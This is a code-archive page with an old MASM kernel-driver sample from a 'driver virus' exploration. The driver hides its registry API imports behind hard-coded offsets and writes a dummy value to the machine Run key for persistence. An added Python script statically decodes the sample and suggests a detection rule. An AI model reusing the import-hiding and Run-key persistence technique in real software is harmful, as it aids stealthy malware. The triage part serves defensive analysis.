虫虫下载站

hello.asm

From the archive 2004-03-05_驱动病毒探索.rar: an exploration of how driver viruses work.
Language: ASM
.386
.model flat,stdcall

; These PROTOs are never CALLed through directly. With .model flat,stdcall MASM
; decorates the names to the import-thunk symbols (__imp__ZwOpenKey@12,
; __imp_@IofCallDriver@8, ...). Only _imp_@IofCallDriver is actually referenced
; below, so the driver's import table shows a single, innocuous entry while the
; code still reaches the Zw* registry APIs.
_imp__ZwOpenKey PROTO NEAR32 stdcall,
    nStdHandle:DWORD,
    nStdHandle1:DWORD,
    nStdHandle2:DWORD

_imp_@IofCallDriver PROTO NEAR32 stdcall,
    nStdHandle:DWORD,
    nStdHandle1:DWORD

_imp__ZwSetValueKey PROTO NEAR32 stdcall,
    nStdHandle:DWORD,
    nStdHandle1:DWORD,
    nStdHandle2:DWORD,
    nStdHandle3:DWORD,
    nStdHandle4:DWORD,
    nStdHandle5:DWORD

_imp__ZwClose PROTO NEAR32 stdcall,
    nStdHandle:DWORD

public DriverEntry@8

.CODE
DriverEntry@8:
    jmp Start

    ; All data lives inside the code section, behind the jump.
    ; RunPath: NUL-terminated UTF-16 string, 64 WORDs including the NUL:
    ;   "\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\Run"
    RunPath DW 05CH, 052H, 065H, 067H, 069H, 073H, 074H, 072H, 079H, 05CH, 04DH, 061H, 063H, 068H, 069H, 06EH
            DW 065H, 05CH, 053H, 06FH, 066H, 074H, 077H, 061H, 072H, 065H, 05cH, 04dH, 069H, 063H, 072H, 06FH
            DW 073H, 06FH, 066H, 074H, 05CH, 057H, 069H, 06EH, 064H, 06FH, 077H, 073H, 05CH, 043H, 075H, 072H
            DW 072H, 065H, 06EH, 074H, 056H, 065H, 072H, 073H, 069H, 06FH, 06EH, 05CH, 052H, 075H, 06EH, 000H

    ; UNICODE_STRING { Length = 0080h, MaximumLength = 0080h, Buffer = RunPath }
    RegPath DD 000800080H, RunPath

    ; OBJECT_ATTRIBUTES { Length = 18h, RootDirectory = 0, ObjectName = RegPath,
    ;                     Attributes = 0, SecurityDescriptor = 0, SecurityQualityOfService = 0 }
    ObjAttr DD 018h, 0, RegPath, 0, 0, 0

    ; HANDLE filled in by ZwOpenKey
    RunKey DD ?

    ; value name "ABCDE" as UTF-16, and its UNICODE_STRING { Length = 000Ch, MaximumLength = 000Ch }
    ValueNameStr DW 041H, 042H, 043H, 044H, 045H, 000H
    ValueName    DD 0000C000CH, ValueNameStr

    ; value data "EDCBA" as UTF-16 (REG_SZ, 12 bytes including the NUL)
    ValueStr DW 045H, 044H, 043H, 042H, 041H, 000H

Start:
    ; enter procedure
    push ebp
    mov ebp, esp

    ; ZwOpenKey(&RunKey, KEY_ALL_ACCESS (0F003Fh), &ObjAttr)
    lea eax, ObjAttr
    push eax
    push 0000F003FH
    lea eax, RunKey
    push eax
    ; Resolve the callee as IofCallDriver's address plus a hard-coded offset:
    ; read the IAT slot, then add the distance to ZwOpenKey in the one ntoskrnl
    ; build this was written against. On any other kernel build the CALL lands
    ; somewhere else entirely.
    mov eax, _imp_@IofCallDriver
    mov eax, [eax]
    add eax, 017979dh
    ; call ZwOpenKey
    call eax
    cmp eax, 0
    jnz RETURN                  ; NTSTATUS != STATUS_SUCCESS: skip the write
SUCCESS:
    ; ZwSetValueKey(RunKey, &ValueName, TitleIndex = 0, REG_SZ, &ValueStr, 0Ch)
    lea eax, ValueStr
    push 00000000CH             ; DataSize: ValueStr length in bytes
    push eax                    ; Data: ValueStr address
    push 000000001H             ; Type = REG_SZ
    push 000000000H             ; TitleIndex = 0
    lea eax, ValueName
    push eax                    ; ValueName: UNICODE_STRING
    mov eax, RunKey
    push eax                    ; KeyHandle
    mov eax, _imp_@IofCallDriver
    mov eax, [eax]
    add eax, 0179B32h
    ; call ZwSetValueKey
    call eax

    ; ZwClose(RunKey)
    mov eax, RunKey
    push eax
    mov eax, _imp_@IofCallDriver
    mov eax, [eax]
    add eax, 0179996h
    ; call ZwClose
    call eax
RETURN:
    xor eax, eax                ; always report STATUS_SUCCESS to the I/O manager
    ; leave procedure
    mov esp, ebp
    pop ebp
    ret 08

    END
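As an added triage aid that is not part of the original archive: the Python below parses the DW/DD definitions from the listing (copied inline as constructed input), decodes the UTF-16 arrays, and checks each UNICODE_STRING's Length/MaximumLength against the buffer it points at. This is the static step an analyst takes to confirm which key a driver like this touches (here the machine Run key, value "ABCDE" set to "EDCBA") without loading it; the parser, the function names and the `LISTING` excerpt are my own.

```python
"""Static triage of the hello.asm data block: recover the wide-char strings and the
UNICODE_STRING / OBJECT_ATTRIBUTES fields the driver hands to ZwOpenKey and ZwSetValueKey."""
import re
from typing import Dict, List, Optional, Union

# Constructed input: the DW/DD definitions copied from the hello.asm listing above.
LISTING = """
    RunPath DW 05CH, 052H, 065H, 067H, 069H, 073H, 074H, 072H, 079H, 05CH, 04DH, 061H, 063H, 068H, 069H, 06EH
            DW 065H, 05CH, 053H, 06FH, 066H, 074H, 077H, 061H, 072H, 065H, 05cH, 04dH, 069H, 063H, 072H, 06FH
            DW 073H, 06FH, 066H, 074H, 05CH, 057H, 069H, 06EH, 064H, 06FH, 077H, 073H, 05CH, 043H, 075H, 072H
            DW 072H, 065H, 06EH, 074H, 056H, 065H, 072H, 073H, 069H, 06FH, 06EH, 05CH, 052H, 075H, 06EH, 000H
    RegPath DD 000800080H, RunPath
    ObjAttr DD 018h, 0, RegPath, 0, 0, 0
    RunKey  DD ?
    ValueNameStr DW 041H, 042H, 043H, 044H, 045H, 000H
    ValueName    DD 0000C000CH, ValueNameStr
    ValueStr     DW 045H, 044H, 043H, 042H, 041H, 000H
"""

# "[label] DW|DD operand, operand, ..."; the label is absent on continuation lines.
DATA_LINE = re.compile(r"^\s*(?:(\w+)\s+)?(DW|DD)\s+(.+?)\s*$", re.IGNORECASE)
Operand = Union[int, str, None]


def parse_operand(tok: str) -> Operand:
    """MASM operand: 'nnnH' hex, decimal, '?' (uninitialised) or a symbolic reference."""
    tok = tok.strip()
    if tok == "?":
        return None
    m = re.fullmatch(r"([0-9A-Fa-f]+)[Hh]", tok)
    if m:
        return int(m.group(1), 16)
    if tok.isdigit():
        return int(tok, 10)
    return tok


def parse_data_block(text: str) -> Dict[str, dict]:
    """Collect every labelled DW/DD definition, merging unlabelled continuation lines."""
    entries: Dict[str, dict] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        m = DATA_LINE.match(line.split(";", 1)[0])  # ignore trailing comments
        if not m:
            continue
        label, directive, operands = m.groups()
        values = [parse_operand(t) for t in operands.split(",")]
        if label:
            current = label
            entries[current] = {"directive": directive.upper(), "values": values}
        elif current and entries[current]["directive"] == directive.upper():
            entries[current]["values"].extend(values)
    return entries


def decode_wide(words: List[Operand]) -> str:
    """Decode a DW array as a NUL-terminated UTF-16LE string."""
    raw = bytearray()
    for w in words:
        if not isinstance(w, int) or w == 0:
            break
        raw += w.to_bytes(2, "little")
    return raw.decode("utf-16-le")


def wide_arrays(entries: Dict[str, dict]) -> Dict[str, str]:
    """Every DW array decoded: this is where the registry path and value text hide."""
    return {n: decode_wide(e["values"]) for n, e in entries.items() if e["directive"] == "DW"}


def unicode_strings(entries: Dict[str, dict]) -> Dict[str, dict]:
    """Find UNICODE_STRINGs: DD { Length | MaximumLength << 16, Buffer } where Buffer names a DW array."""
    found = {}
    for name, e in entries.items():
        vals = e["values"]
        if e["directive"] != "DD" or len(vals) != 2 or not isinstance(vals[0], int):
            continue
        buf = vals[1]
        if not isinstance(buf, str) or entries.get(buf, {}).get("directive") != "DW":
            continue
        words = entries[buf]["values"]
        text = decode_wide(words)
        length, max_length = vals[0] & 0xFFFF, vals[0] >> 16
        found[name] = {
            "buffer": buf, "text": text,
            "length": length, "maximum_length": max_length,
            "buffer_bytes": 2 * len(words),
            # Length counting the terminating NUL is unusual for a UNICODE_STRING but harmless here
            "length_includes_nul": length == 2 * (len(text) + 1),
        }
    return found


if __name__ == "__main__":
    entries = parse_data_block(LISTING)
    for name, text in wide_arrays(entries).items():
        print(f"{name:14s} -> {text!r}")
    for name, info in unicode_strings(entries).items():
        print(f"{name:14s} -> UNICODE_STRING(Length={info['length']:#x}, "
              f"MaximumLength={info['maximum_length']:#x}, Buffer={info['buffer']}) = {info['text']!r}")
```

Running it recovers the key path `\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\Run`, the value name `ABCDE` and the data `EDCBA`, and shows that both Length fields (0x80 and 0xC) count the terminating NUL. Combined with the import table (a single `IofCallDriver` entry) and the `0F003Fh` access mask (`KEY_ALL_ACCESS`), that is enough to classify the sample as a Run-key persistence writer and to write a static rule for the pattern: a driver with almost no imports whose code section holds a UTF-16 `\Registry\Machine\...\Run` path.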
